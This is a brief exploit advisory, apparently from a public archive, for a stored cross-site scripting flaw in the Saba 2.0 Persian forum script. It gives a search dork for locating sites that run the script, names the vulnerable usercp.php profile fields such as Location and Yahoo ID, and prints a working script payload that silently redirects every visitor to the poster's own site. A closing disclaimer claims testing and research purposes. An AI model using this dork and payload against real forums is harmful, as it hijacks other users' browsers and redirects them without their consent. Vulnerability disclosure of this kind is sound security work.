Saba 2.0 Cross Site Scripting (JS Injection)
http://Aria-Security.com
---------------------------------------------------------------
Saba 2.0 is a Persian Forum Script
Dork: Powered by Saba 2.0
Vulnerable file: usercp.php
usercp.php?username=YourUserName
The above script can be inserted as Location, Yahoo ID and other fields in the usercp page..
<script> document.write('<meta http-equiv="refresh" content="0; url=http://Aria-Security.com/index.html">'); </script>
The-0utl4w
Aria-Security Team
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum